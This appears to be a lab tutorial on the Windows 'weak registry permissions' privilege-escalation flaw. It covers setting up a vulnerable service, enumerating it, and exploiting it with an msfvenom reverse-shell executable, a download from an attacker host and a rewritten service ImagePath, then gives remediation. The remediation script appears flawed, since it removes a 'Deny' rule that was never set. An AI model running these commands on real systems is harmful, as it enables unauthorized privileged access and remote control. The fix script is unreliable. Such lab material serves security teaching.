Weak registry permissions represent a vulnerability within the Windows registry resulting from misconfigured access controls. This issue involves specific registry keys or entries having permissions that permit unauthorized users to manipulate or access crucial system configurations. This vulnerability can be exploited by attackers who inject malicious code into registry keys, thus obtaining unauthorized privileged access.
- Open a PowerShell with local Administrtor Privileges and use the following command to create a new folder:
mkdir "C:\Program Files\CustomSrv4\"
-
Download the file Service4.exe to the 'C:\Program Files\CustomSrv4' directory.
-
Install the new Service:
New-Service -Name "Vulnerable Service 4" -BinaryPathName "C:\Program Files\CustomSrv4\Service4.exe" -DisplayName "Vuln Service 4" -Description "My Custom Vulnerable Service 4" -StartupType Automatic
- Edit new service's permissions to be controlled by BUILTIN\Users:
cmd.exe /c 'sc sdset "Vulnerable Service 4" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWP;;;BU)'
Outcome:
- Open Registry panel with
regedit
command and navigate to 'Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4':
- Right click on "Vulnerable Service 4" and choose the "permissions" option:
- Allow Full Access control on Users and then press "OK" button:
To set up the lab with the 'Weak Registry Permissions' vulnerability is by using the custom PowerShell script named WeakRegistryPermissions.ps1.
- Open a PowerShelll with local Administrator privileges and run the script:
.\WeakRegistryPermissions.ps1
Outcome:
To perform manual enumeration of the Weak Registry Permissions
vulnerability, you can use the following steps:
- Open a Powershell and use the following command to enumerate registry permissions:
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl
- Use the following command to identify the image path of the service:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
Outcome:
To run the SharpUp tool and perform an enumeration of the Weak Registry Permissions
vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit ModifiableServiceRegistryKeys
Outcome:
To abuse this vulnerability you should follow these steps:
- Create with msfvenom a malicious exe file:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f exe > Service4.exe
-
Open a listener in your kali machine.
-
Transfer the malicious executable in victim's machine:
iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe
- Change the image path for service:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f
- Start the service with the following command or reboot the machine:
sc start "Vulnerable Service 4"
Outcome:
- Verify the reverse shell on your Kali machine:
To defend against Weak Regisrty Permissions vulnerabilities, adjust permissions on Regisrty hives initiated through this mechanism. This limits unauthorized access and strengthens security measures:
-
Open Registry panel with
regedit
command and navigate to 'Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4'. -
Right click on "Vulnerable Service 4" and choose the "permissions" option.
-
Remove the checkmark from the 'Full Control' box assigned to 'Users,' then click the 'OK' button.
However, you can use the following PowerShell script:
# Define the registry key path
$regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
# Get the current ACL (Access Control List) for the registry key
$acl = Get-Acl -Path $regKey
# Specify the account and access rights to be removed
$account = "BUILTIN\Users"
$accessRights = [System.Security.AccessControl.RegistryRights]::FullControl
# Create a new access rule to remove FullControl
$accessRule = New-Object System.Security.AccessControl.RegistryAccessRule($account, $accessRights, "Deny")
# Remove the access rule from the ACL
$acl.RemoveAccessRule($accessRule)
# Set the modified ACL back to the registry key
Set-Acl -Path $regKey -AclObject $acl